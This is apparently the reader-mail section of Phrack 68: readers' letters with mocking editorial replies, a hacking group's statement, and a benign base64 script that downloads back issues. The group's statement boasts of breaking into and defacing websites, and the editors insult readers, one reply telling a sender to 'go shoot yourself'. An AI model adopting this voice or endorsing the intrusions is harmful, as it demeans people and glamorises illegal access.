->> Slasher is nameless@155.207.206.86 (LoCo En El CoCo)
|
|
->> Slasher is on: #grhack #anarchy
|
|
|
|
|
|
--ChanServ-- Information for channel #grhack:
|
|
--ChanServ-- Founder: Slasher
|
|
--ChanServ-- Description: GR Hack - http://www.grhack.net
|
|
--ChanServ-- Registered: Aug 05 21:36:46 2010 EEST
|
|
|
|
|
|
--NickServ-- Information for nickname Slasher:
|
|
--NickServ-- Realname: LoCo En El CoCo
|
|
--NickServ-- Is online since: Dec 21 17:26:15 2010 EET
|
|
--NickServ-- Time registered: Oct 25 23:22:13 1999 EEST
|
|
--NickServ-- Last quit message: Ping timeout
|
|
--NickServ-- E-mail address: slasher@grhack.net
|
|
--NickServ-- Options: Kill protection, Security, Private
|
|
--NickServ-- *** End of Info ***
|
|
|
|
|
|
Maybe spyadmin is closed by google blogspot after the emails of grhack.net
|
|
Slasher cuz the stuff is related about him
|
|
|
|
but look the comments of this website and the date, to know the existance
|
|
of spyadmin
|
|
|
|
http://press-gr.blogspot.com/2007/09/blog-post_3165.html
|
|
|
|
(SOMETHING IN GREEK...)
|
|
spyadmin.blogspot.com
|
|
(SOMETHING IN GREEK AGAIN)
|
|
(7 September 2007)
|
|
|
|
Now look also the date of the defacement in the zone-h digital archive:
|
|
|
|
http://zone-h.org/mirror/id/6638423
|
|
|
|
and look the date too,
|
|
# Mirror saved on: 2007-09-08 13:58:32
|
|
# * Notified by: GHS
|
|
(8 September 2007)
|
|
|
|
---
|
|
|
|
Greek Hacking Scene has no colour and does not support any political side.
|
|
|
|
Take example to indymedia athens, i will give you 2 links, in the first
|
|
they say that GHS is nationalist and hack their website, and in the other
|
|
link on the same website, they give congratulations in GHS cuz they did
|
|
actions and defacements according to left ideology.
|
|
|
|
In fact GHS has it's own ideology and act as GHS believe.
|
|
|
|
1 link:
|
|
http://athens.indymedia.org/front.php3?lang=3Del&article_id=3D706934
|
|
|
|
2 link:
|
|
http://athens.indymedia.org/front.php3?lang=3Del&article_id=3D620090
|
|
|
|
The comments are yours, let see the Freedom of Speech now, the TRUE the
|
|
REALITY, the FACTS!
|
|
|
|
Somes they didn't learn from their mistakes. GHS has no hate for anyone and
|
|
act not for revenge causes or anything else. According to all our actions,
|
|
we do warning and when we act we just put the informations as is, we don't
|
|
put sauses, you put sauses maybe.
|
|
|
|
The reason i wrote this is the true and reality.
|
|
|
|
Before some years there are many "hackers" in Greek chat rooms etc, they
|
|
speak about theory and when kids comming to learn, they laught only at them
|
|
and they make those kids to become like them, liers without education and
|
|
knowledge, kids that become like them, to know just some words, theory
|
|
without they know what for they speak about and to spend lost time chatting
|
|
and destroy other kids comming. Members of GHS hacked and take access in
|
|
most and almost all Greek websites, chat rooms, irc servers etc, that was
|
|
security-hacking related. We are always here, maybe not the same persons,
|
|
but members of GHS are change all the time and keep the safe ideology. In
|
|
the other hand, we let teenagers who are interested to hacking, we turn
|
|
them to coding, to let them think their future, education, freedom ideas
|
|
and to let them want to do things and create. Defacements and Hacking are
|
|
our fireworks to let them get the magic and on the way to show to them that
|
|
there are so many tools and things on net to hack a website and hack, but
|
|
if you want to go more further, you have to learn coding, to explore, to
|
|
let your mind free and think far away, for what can be happen and what not.
|
|
To go a step further with their minds, not by giving them stuff in the
|
|
plate, but let them do it and explore it by their selfs! I know keeps that
|
|
believe and do things, on the way they do things and go advance, those kids
|
|
are the next cycle of GHS who will pass the same ideas, believes and
|
|
technology to the next generations.
|
|
|
|
Greek Hacking Scene 2010.
|
|
|
|
[ All we can say is 'What?' ]
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x07 - Interesting mails ]=----------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: "L. *****" <l.*******@yahoo.com>
|
|
Subject: idea for next profile
|
|
|
|
my you should do a hacker profile on j3ster since he is one of the most
|
|
prominent hackers that I've heard about out there,
|
|
|
|
[ Dunno the guy. We already chose one anyway. You may have heard of
|
|
him. ]
|
|
|
|
or do one on that rat who turned in bradley manning
|
|
|
|
[ The saying is not: Snitches get Prophiles. ]
|
|
|
|
|
|
---
|
|
|
|
From: infosec <infosec@cyberdo.net>
|
|
Subject: Release date?
|
|
|
|
Hi Guys,
|
|
|
|
Firstly, let me thank you for the on-going release of this great
|
|
e-zine.
|
|
|
|
[ You're welcome. ]
|
|
|
|
Most of these e-zines surfaced and then disappears over the horizon yet
|
|
albeit the long term delays in-between releases :)you've kept this
|
|
going.
|
|
Thank you.
|
|
|
|
[ ^_^ ]
|
|
|
|
I am very much interested in the up and coming release and would like
|
|
to know the date or drop us a note on the website.
|
|
|
|
[ Done. ]
|
|
|
|
Also, I'd like to know how to join phrack team of staff.
|
|
|
|
[ There is a GREAT mystery about how the phrack staff acquires
|
|
members. Sorry dude, there is currently no open spot :) ]
|
|
|
|
Greetz,
|
|
infosec
|
|
|
|
---
|
|
|
|
From: Zagan Hacktop <zagan@live.co.uk>
|
|
Subject:
|
|
|
|
YO!
|
|
do you still have an IRC?
|
|
|
|
[ We do. But it's a private one. We may open a public or half-public
|
|
one someday... Don't hold your breath however. ]
|
|
|
|
---
|
|
|
|
From: daniel ***** <******@gmail.com>
|
|
Subject: new age LoD
|
|
|
|
hi am a head of a team that disided that LoD
|
|
is a legacy and cant just disappear... it must be reborn or the web will
|
|
loose alot and with the way things are going today
|
|
the web realy cant efored it or it will eventualy die for the simple
|
|
user...
|
|
|
|
we are looking for the original LoD members (or at list any way to
|
|
comunicate with them)
|
|
(specialy for night lightning)
|
|
|
|
if this information can be passed to them it would be realy nice.. all we
|
|
want is a some advice (not technical) ...
|
|
|
|
|
|
my email is ******@gmail.com (nick: galeran).
|
|
if you can help please do
|
|
thanks
|
|
|
|
[ Not sure about the true intentions but anyway this might help.]
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x08 - Greek people are angry ]=----------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
[ For clarification purposes, we received this mail after we released
|
|
the index and before we released the philes. ]
|
|
|
|
---
|
|
|
|
From: Iordanis Patimenos <iopatmenos@yahoo.gr>
|
|
Subject: Phrack 67
|
|
|
|
[ So what, another greek? At least this one is not complaining about
|
|
the scene phile ;) ]
|
|
|
|
YEAR: 2010, OSs:64-bit, protection mechanisms: ASLR, DEP, NX, .... , Attack
|
|
mechanisms: JAVA VM exploitation, Flash VM exploitation, ... the only
|
|
thing you had to do was to let the knowledge flow.
|
|
|
|
[ The only thing? Such a nice little kid daydreaming :) ]
|
|
|
|
What to do the info in 'Scraps of notes on remote stack overflow
|
|
exploitation', 'Exploiting Memory Corruptions in Fortran Programs Under
|
|
Unix/VMS' (FORTRAN wtf),
|
|
|
|
[ FORTRAN... indeed :') We'll do something about COBOL as well (it is
|
|
'safe' so no memory corruptions, something else). We'll keep you
|
|
posted. ]
|
|
|
|
'A Eulogy For Format Strings' if we cannot apply on current protection
|
|
mechanisms.
|
|
|
|
[ Well that's the point. You can. Oh wait, you would have known if
|
|
you had kept your sorry mouth shut and actually read the papers
|
|
first :> ]
|
|
|
|
New edit or better you didn't publish this new fucking delayed, bad content
|
|
phrack p67, BIG FAIL, that's not the PHRACK we know. What a retarded
|
|
content you provided after all this waiting time!!! Not a chance to compare
|
|
to previous phrack issues. This issue is just a joke, nothing more, happy
|
|
1st APril assholes, you made PHRACK seems trash magazine.
|
|
|
|
[ The cool thing with morons like you is that it would be pointless to
|
|
explain things, which makes our job somewhat easier. Congratulations
|
|
for your participation in p68, you've made it ;-) ]
|
|
|
|
-Fan of Phrack-
|
|
|
|
[ Yes. It shows. ]
|
|
|
|
---
|
|
|
|
From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
|
|
Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON
|
|
|
|
[ Another desperate housewife? The name is familiar...]
|
|
|
|
YOU ARE SO FUCKING FUNNY
|
|
|
|
[ WE DO HOPE WE ARE ]
|
|
|
|
I'M SURE THE NEW ISSUE WILL BE SUCH A FAIL AS THE PREVIOUS ONE (THE ONE
|
|
THAT YOU TRIED TO ADVERTISE AS A BIG HIT)
|
|
|
|
[ OHHHHH A BIG HIT REALLY? DAMMIT MY CAPSLOCK IS REALLY FUCKED. ]
|
|
|
|
JUNE 2011: PHRACK ISSUE #68 ... YES _SUCH_A_FAIL
|
|
|
|
[ NOT IN JUNE, WE ARE *ALWAYS* LATE ]
|
|
|
|
---
|
|
|
|
From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
|
|
Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON
|
|
|
|
Group: The Phrack Staff
|
|
|
|
[ Hum, it seems that you have fixed the capslock problem.
|
|
You're elite. ]
|
|
|
|
Most *FAIL* group ever in phrack, you hurt the magazine go away.
|
|
|
|
[ Hey now I remember you!!! :) It looks like you are obsessed with us.
|
|
You must be our number one fan in greece. Even now that we have so
|
|
many greek fans. ]
|
|
|
|
>>>>>>>>>> From earlier >>>>>>>>>>
|
|
From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
|
|
Subject: Phrack issue 58
|
|
|
|
How can i get the binary-encryption.tar.gz
|
|
from the article Runtime binary encryption?
|
|
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
|
|
|
[ So:
|
|
1. Did you manage to download the file? :)))))
|
|
2. *EPIC* *FAIL*?
|
|
]
|
|
|
|
---
|
|
|
|
From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
|
|
Subject: New phrack issue
|
|
|
|
[ What? You again? ]
|
|
|
|
Marry Christamas :) and happy New York
|
|
|
|
[ LOL. You're doing it wrong! ]
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x09 - PHRACK got spam'd? ]=---------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: ***** ******** <darkjoker93@gmail.com>
|
|
Subject: ANTISPAM
|
|
|
|
Hi guys :)
|
|
Here's an article I've just written, I know it's a bit late for the
|
|
submissions, but perhaps you may publish it in the next issue. Anyway, the
|
|
topic is how to bypass a captcha, and, in particular, how to bypass the one
|
|
on your site :). No offense, but it's really weak.
|
|
|
|
[ None taken. We simply took the first capcha mechanism available on
|
|
the web which was not going to get us owned. However we got spam,
|
|
that's for sure, sorry about that fellow readers. ]
|
|
|
|
If you don't find it interesting please at least change your captcha
|
|
because I'm really sick (and I'm sure I'm not the only one) of reading
|
|
spam messages (I swear it was not me :).
|
|
|
|
[ We'll do both so that you can get better :> ]
|
|
|
|
I'm italian, therefore my english is not very good,
|
|
|
|
[ Nobody's perfect! ]
|
|
|
|
if the paper is so bad written it can't be even read, send it back to me,
|
|
I'll try to rewrite it in a better way.
|
|
|
|
Bye,
|
|
darkjoker
|
|
|
|
[ And that's the story of how his contribution got published in
|
|
Linenoise. Thx darkjoker. ]
|
|
|
|
---
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0A - The urge to get p68!!! ]=-----------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Barak ***** <barak*****@gmail.com>
|
|
Subject: Question
|
|
|
|
[ This one is not the current president of the US, we checked. ]
|
|
|
|
Hi,
|
|
|
|
I have been following the magazine for a while now and I have been waiting
|
|
for the new issue. Last I checked it was suppose to come out in June...
|
|
Can you let me know when I should except the new issue?
|
|
|
|
[ Are you reading this? Then issue #68 is out. You're welcome. ]
|
|
|
|
Barak
|
|
|
|
[ That's the problem with every issue, you should NEVER trust us when
|
|
we announce dates ;) ]
|
|
|
|
---
|
|
|
|
From: Rodri ***** <rodrigo******@hotmail.com>
|
|
Subject:
|
|
|
|
[ Hey ANTISPAM is missing! ]
|
|
|
|
Hello,
|
|
|
|
For godsake we are already in June!
|
|
|
|
[ Sorry about that bro :) ]
|
|
|
|
Now seriously and kindly is it coming out soon?
|
|
|
|
Best regards.
|
|
Roders.
|
|
|
|
---
|
|
|
|
From: LEGEND XEON <legend.xeon@gmail.com>
|
|
Subject: Phrack 68th Issue Release
|
|
|
|
Hello mate,
|
|
I am very interested in upcoming 68th issue of phrack.
|
|
The whole world is counting on you!!
|
|
|
|
[ The whole world? Not even the whole scene mate ;) ]
|
|
|
|
I just want to know when will be the release and can you give me a glimpse
|
|
of contents inside it.
|
|
I will be eagerly waiting for your reply.
|
|
|
|
[ Hehe, hope you didn't wait too much. ]
|
|
|
|
~Legend_Xeon
|
|
|
|
---
|
|
|
|
From: fernando ****** <core******@gmail.com>
|
|
Subject:
|
|
|
|
my life gets duller every day you don't release the new issue
|
|
|
|
[ Let's hope this one didn't commit suicide before we released :| ]
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0B - Students project? ]=----------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: "(s) Charmaine Anderson" <Charmaine.Anderson@students.newport.ac.uk>
|
|
Subject: Creating Middle-Ware for Distributed Cryptanalytic Applications
|
|
|
|
To whom it may concern,
|
|
|
|
I am contacting you to tell you about my final year project for my degree.
|
|
I would be very grateful if you were able to follow my progress and perhaps
|
|
also contribute any tips and ideas. I will also be writing an application
|
|
which, if successful, I will be posting online for download.
|
|
|
|
Using the RC5 block cipher and the competitions run by RSA Laboratories
|
|
(1997-2007) as benchmarks, experiments will be conducted using different
|
|
methods of distributed computing. The implications of the results will lead
|
|
to a better understanding of how cryptanalysis can be conducted through
|
|
areas such as grids and internet-based cloud computing or virtualisation.
|
|
|
|
The reason for this project is that distribution methods have been used for
|
|
many years in order to conduct cryptanalysis; however, I have noticed that
|
|
this has been for purposes such as testing the security of new ciphers and
|
|
creating a better understanding of how they work. But, to my knowledge,
|
|
there has been little-to-no research into the implications of real-world
|
|
attacks through distribution.
|
|
|
|
To summarise, I plan to test the limits of computational security in order
|
|
to expose the possibility of real-world cryptanalytic attacks using the
|
|
'unlimited' computing power that is slowly becoming available to the
|
|
public.
|
|
|
|
It is possible to follow the progress of this project through
|
|
http://www.distributedcryptanalysis.co.uk/. A number of blogs are also
|
|
being used in order to attract more interest, links to these will be posted
|
|
on the website very shortly.
|
|
|
|
Yours Sincerely,
|
|
|
|
Charmaine Anderson
|
|
|
|
BSc (Hons) Forensic Computing
|
|
University of Wales, Newport
|
|
|
|
[ Well he seemed to be a good kid so we published his mail ;) ]
|
|
|
|
---
|
|
|
|
From: Johannes Mitterer <johannesmitterer@googlemail.com>
|
|
Subject: Hacker's Manifesto
|
|
|
|
Dear Phrack-Team,
|
|
|
|
currently I'm working on my bachelor's thesis part of which is an analysis
|
|
of The Mentor's Hacker's Manifesto. In this context, there's little
|
|
confusion about the question how the manifesto was first published. As I
|
|
understand it, the manifesto was first published ONLINE in phrack magazin,
|
|
whereas my professor stated that the first issues of phrack including Issue
|
|
#7 in which the manifesto was published were only available offline as a
|
|
printed version and later put on the internet. Perhaps You could help me
|
|
clearing up this confusion.
|
|
|
|
[ Wasn't the early edition of phrack all scene .txt philes on BBSes?
|
|
Like, #7 was pre internet for sure. I doubt that any of the editors
|
|
back then would have bothered printing hardcopies, since it is
|
|
extremely inefficient and expensive and the target audience is ppl w/
|
|
computers. ]
|
|
|
|
Thanks in advance!
|
|
|
|
Yours,
|
|
Johannes Mitterer
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0C - Phrack & the chicks ]=--------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: kimberly - <*******@hotmail.com>
|
|
Subject: Graduate essay
|
|
|
|
Hello Staff,
|
|
We are senior high school students from 'Stella Maris College' in the
|
|
Netherlands and we are writing an essay about the reputation of hacking. If
|
|
it is okay with you, we would like to ask a few questions:
|
|
- How could you start the site, because hacking is illegal and it might
|
|
endanger your users who discuss hacking?
|
|
|
|
[ Wait it's illegal? We're shutting down the site immediately :| ]
|
|
|
|
- Have you ever gotten negative/positive reactions to your site? And what
|
|
where those reactions?
|
|
|
|
[ Well everything is in this file :D ]
|
|
|
|
- Is there any information that is not known to people who are not hackers
|
|
and that is not easy to find in books or the internet? If so, where could
|
|
we find this information?
|
|
|
|
[ IRCS? Nah it's just for the chitchat :) ]
|
|
|
|
- Is there anything in your opinion that is so important, that we can't
|
|
possibly leave out? We would be very happy if you could answer these
|
|
questions or forward this email to someone who might know more about
|
|
this.
|
|
|
|
[ I'm not too sure you guys will be able to graduate with that many
|
|
questions so good luck :D ]
|
|
|
|
Thank you very much in advance!
|
|
- Dingding and Kimberly
|
|
|
|
---
|
|
|
|
From: Eva ******* <*****@gmail.com>
|
|
Subject: Article
|
|
|
|
Dear Phrack Staff,
|
|
|
|
I'm preparing an article concerning some hacks to Linden Lab's SecondLife
|
|
viewer and I would like to publish the results in your magazine. Could you
|
|
please, if possible, provide some details where and to whom I should send
|
|
it to and if there are any requirements I must fulfil.
|
|
|
|
Thank you,
|
|
Eva
|
|
|
|
[ We published the paper in the linenoise.
|
|
Thanks for the submission Eva! Nice pics btw ;> ]
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0D - ROFL ]=-----------------------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: ***** ***** <****.*****.****@gmail.com>
|
|
Subject: script
|
|
|
|
Man, I was bored taking a break from working on a vpn project at a library
|
|
and decided to make a script in bash to download and decompress the phrack
|
|
mags. Its newb meat but I guess Im just going to send it in for you guys to
|
|
laugh at, rofl.
|
|
|
|
[ ROFL indeed. ]
|
|
|
|
---
|
|
Jackie ***** ****** - *"Focus on Solutions not Problems"*
|
|
|
|
[ But you create solutions for non existent problems :D ]
|
|
|
|
Email0: *****.*****.*****@gmail.com
|
|
Email1: skraps_rwt@yahoo.com
|
|
|
|
[ We added the script below. If someone could help Nikol Eleutheriou to
|
|
decrypt it so that she doesn't complain please... ]
|
|
|
|
begin-base64 644 getPhrack.sh
|
|
IyEvYmluL2Jhc2gKCiNDVVJJU1NVRT0iNjciClVSTD0iaHR0cDovL3d3dy5w
|
|
aHJhY2sub3JnL2FyY2hpdmVzL3Rnei8iCkVaSU5FRElSPSIvaG9tZS9za3Jh
|
|
cHMvZXppbmVzL3BocmFjay8iCkNVUklTU1VFPWBHRVQgaHR0cDovL3d3dy5w
|
|
aHJhY2sub3JnLyB8IGdyZXAgSVNTVUUgfCBjdXQgLWIgNTAtNTFgCiNwaHJh
|
|
Y2s2Ny50YXIuZ3oKCmNkICRFWklORURJUgoKZXhpdHN0YXQoKXsKCWlmIFsg
|
|
JD8gPT0gIjAiIF07IHRoZW4KCQllY2hvICJFeHRyYWN0aW9uIHN1c2NjZXMi
|
|
CgllbHNlCiAgICAgICAgICAgICAgICBlY2hvICJFeHRyYWN0aW9uIGZhaWxl
|
|
ZCIKICAgICAgICBmaQp9Cgpmb3IgKCggeD0xOyB4PCRDVVJJU1NVRTsgeCsr
|
|
ICkpOyBkbwoJaWYgWyAtZiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6
|
|
IF07IHRoZW4KCWVjaG8gIklzc3VlICR4IGV4aXN0cyIKCQlpZiBbIC1lICR7
|
|
RVpJTkVESVJ9JHt4fSBdOyB0aGVuCgkJCWVjaG8gIklzc3VlIHByZXZpb3Vz
|
|
bHkgZXh0cmFjdGVkIgoJCWVsc2UKCQkJZWNobyAiRXh0cmFjdGluZyBJc3N1
|
|
ZSAkeCIKCQkJdGFyIHp4ZiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6
|
|
CgkJCWV4aXRzdGF0CgkJZmkKCWVsc2UKCgkJZWNobyAiRG93bmxvYWRpbmcg
|
|
aXNzdWUgJHggLi4uLiIKCQlHRVQgJHtVUkx9cGhyYWNrJHt4fS50YXIuZ3og
|
|
PiAke0VaSU5FRElSfXBocmFjayR7eH0udGFyLmd6CgkJZWNobyAiRG9uZSBk
|
|
b3dubG9hZGluZyBpc3N1ZSAkeCAuLi4uIgoJCWVjaG8gIkV4dHJhY3Rpbmcg
|
|
aXNzdWUgJHgiCgkJdGFyIHp4dmYgJHtFWklORURJUn1waHJhY2ske3h9LnRh
|
|
ci5negoJCWV4aXRzdGF0CglmaQpkb25lICAK
|
|
====
|
|
|
|
---
|
|
|
|
From: Tom <thom128@gmail.com>
|
|
Subject: Phrack Rules The World!
|
|
|
|
Hi there,
|
|
|
|
I like hacking but I never done it.
|
|
|
|
[ So how do you know that you like it? ]
|
|
|
|
Wrote a poem about it.
|
|
|
|
[ Was it worth it? ]
|
|
|
|
I wanna work in IT as systems admin.
|
|
|
|
[ Hem... ok? Why? :) ]
|
|
|
|
Please publish my poem in your magazine.
|
|
|
|
[ Done! ]
|
|
|
|
Phrack Rules!
|
|
|
|
[ Sure it does! ]
|
|
|
|
Heil from London, England.
|
|
|
|
Razor Tech Warrior
|
|
|
|
They told you that you were nothing
|
|
Just another name and number
|
|
They said you were dumb and dumber
|
|
|
|
But you stole
|
|
Their lives away
|
|
Network Nazi
|
|
Live to fight another day
|
|
|
|
[ Network Nazi Live to fight another day <-- WTF ???? ]
|
|
|
|
Through the black
|
|
Of the nights metal sheets
|
|
In tower blocks and tenements
|
|
Cyber crime it breeds
|
|
|
|
The government will stomp you out
|
|
But burn their kernel
|
|
Lock it down
|
|
While others are still asleep.
|
|
|
|
[ We are speechless. All we can say is: LOL. ]
|
|
|
|
---
|
|
|
|
From: Tom <thom***@gmail.com>
|
|
Subject: Some Photos From London
|
|
|
|
Hi there,
|
|
|
|
Just thought i would send u some pics of me and my family/friends. i love
|
|
the mag am a big fan...keep up the good work.
|
|
|
|
[ And he really sent us pics. Your Grandma seems nice btw but you look
|
|
like a virgin geek unfortunately :( ]
|
|
|
|
---
|
|
|
|
From: b-fox <*****@bol.com.br>
|
|
Subject: Hey... Mother fucker
|
|
|
|
[ Hey. p0rn industry calls it MILF fucking ]
|
|
|
|
Wait my document... I'm gonna write I paper today about/regarding bomb
|
|
development and something abt legislation in general. Huge hug!
|
|
|
|
[ Priceless. :') ]
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0E - Shame Shame Shame.......shame on you ]=---------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: varenya mehta <varenya2007@yahoo.co.in>
|
|
Subject: ANTISPAM
|
|
|
|
Run both ethernet and phone over existing Cat-5 cable
|
|
|
|
[ Cool! New submission! \o/ ]
|
|
|
|
The new fad when building a house is to run Cat-5 cable to every wall jack.
|
|
These jacks can then be used for either ethernet or phone. When we got our
|
|
new house built, we chose to get four of these jacks, and we intended to
|
|
use them for phone service. Unfortunately, the wifi is a bit flaky in
|
|
places (even with two access points.) This got annoying up until the point
|
|
where three of the four wall jacks were being used for ethernet, leaving
|
|
just one for phone. This was a problem.
|
|
|
|
The solution is to run both ethernet and phone over the same existing cat-5
|
|
cable. Every wall jack becomes two jacks, one RJ-11 for phone and one RJ-45
|
|
for ethernet. This neat hack could save you a lot of money, as you only
|
|
have to buy new wall plates and jacks rather than wall plates, jacks, and
|
|
hundreds of feet of wire.
|
|
|
|
[ Really cool hack. This one may fit in the linenoise :) ]
|
|
|
|
[...]
|
|
|
|
Also note that this procedure will not work with PoE (Power over Ethernet)
|
|
devices. Nothing bad will happen, it just won't transmit power. See step 13
|
|
for apossibly unsafe way to keep your PoE and add phone service. Also, it
|
|
will not work with gigabit ethernet-- gigabit ethernet uses all four pairs.
|
|
It will work fine at 10/100 Mbps which is sufficient for most people
|
|
|
|
[ Wait! Something is wrong. What is step13 and aren't a few things
|
|
missing? Let's google() a bit...
|
|
|
|
@(X_X)@
|
|
|
|
http://www.instructables.com/id/Hack-your-House-Run-both-ethernet-
|
|
and-phone-over-/
|
|
|
|
So not only did you send us a ripped paper. But you idiot were not
|
|
smart enough to click on "Next step" to copy the whole. LOL. ]
|
|
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
P.S. -please reply whether my submission will be added or not in this
|
|
edition of ur highly esteemed Phrack magazine...loking forward to your
|
|
reply :)
|
|
cheers
|
|
|
|
[ Ur highly esteemed Phrack magazine would recommend to go shoot
|
|
yourself. ]
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0F - Insanity or SPAM??? ]=--------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
---
|
|
|
|
From: John Smith <devils-advocate-666@live.com>
|
|
Subject: Dear staff(at)phrack[DOT]org; I love what you guys do for the
|
|
U.S.A! Can you email your e news letters too please? Thank you.
|
|
|
|
Can you please add me to your e-news letter list, so that I can recieve new
|
|
updates from your cite? I totally loved what you guys had written about ai,
|
|
and mind hacking and about hacking for the U.S. and Cypher Punks & Ninja
|
|
Strike Force! Best of luck to all of you staff members at Phrack! I would
|
|
like to know if you guys could please email me back some information in
|
|
regards about rsome bank accounts that was on CRYPTOME, or if you guys
|
|
could tell me about how you all had cash flow that came from hacked ATM
|
|
terminals that you guys had done remotely, because I need to be hacking
|
|
systems right now and I had all of my stuff jacked and I was robbed with
|
|
all of your softwares that I had for CIA/ NSA and I've been trying to log
|
|
onto some banking systems for my CIA/ NSA digital cash, or could you guys
|
|
send me some lock picks, or DIE BOLD keys to open some safes and vaults or
|
|
could you send me some Cypher Punks white paiges or other instructions to
|
|
interceptor frozen accounts on line and or how to obtain money for starting
|
|
a Cypher Punks EBB & FLO system to develope an agriculture business plan
|
|
that will help finance money for CIA & NSA op (ie- with IQT and with
|
|
Foresight Nanotechnology Institute and with CTBA.org) to counter the HASHID
|
|
culture? Such as GSPC in Morocco and in Algeria, GIA, FIS, ETI, AQIM,
|
|
Sahel Pan, DR-CONGO, AQAP, Hezbollah, HAMAS, Hizbullah, IMU, and fighting
|
|
against the salafyists in the Magreb's EU-Arabia HASHID zones, and against
|
|
the EVIL EMPIRE's MOIS, MEK, MEKO, PKK, VEVAK, ISI, FSB, KGB, NAK, GRU, and
|
|
Brazillian Guerillas and Chychenian Rebels and mob and Russian Mob for
|
|
GAZPROM Russian Mob Oil Monopoly and countering all of these groups members
|
|
and contacts and countering their economic insugernt threats
|
|
internationally, by hacking into their networks and locating them with RNM
|
|
ai, and blood clotting the Evil Empire, and moving and on the GO like CIA
|
|
backing the "Wrath of GOD" and with the Cult of CIA's MKULTRA program, and
|
|
I mean redndering synapsial "WET WORK" by taking their ballance with the
|
|
"EXIT BLOW," for NSA/ CIA's Ninja Strike Force and I want to be taking our
|
|
threats to the Land of Snow and flurries will show me to the rest of their
|
|
Evil Empires members locations by terminating them with Illuminati and I'll
|
|
be hacking their minds and their bank accounts and stealing all of their
|
|
wealth and contacts and other intelligence for RED Team, and taking their
|
|
materials as loot, and sending it onto an encrypted site, but I want to
|
|
creat my own ai online site with grant.gov grant money asap, and then once
|
|
that's done I can go and locate them with RNM ai, but I would like aving
|
|
somean ai quantum consciousness program with a self assembling "FOG" EW ai
|
|
HDD quantum computer with an infinite memory that would allow me to hack
|
|
bank accounts with an ip installed with nano-bio-technologies with inner
|
|
cellular blood vessel programming and cellular mind net morphing
|
|
technologies with RNM, nanotechnology made with a neuronal networking and
|
|
has a 3-d holographic video and 3-d holographic audio with real world and
|
|
mirror world ai 3-d/ 4-d softwares for an online Cypher Punks & Ninja
|
|
Strike Force & Cult of Dead Cow members with other CIA/ NSA Intelligence
|
|
Analysis Cammander's of Red Teaming (aka- COUNTER-INTELLIGENCE TEAM's ALPHA
|
|
& BRAVO:) Black Ops- Red Teaming forum with an ai 3-d GOOGLE EARTH PRO GPS
|
|
softwares with a soft mobi GLOBAL IP softwares package STEALTH NINJA phone
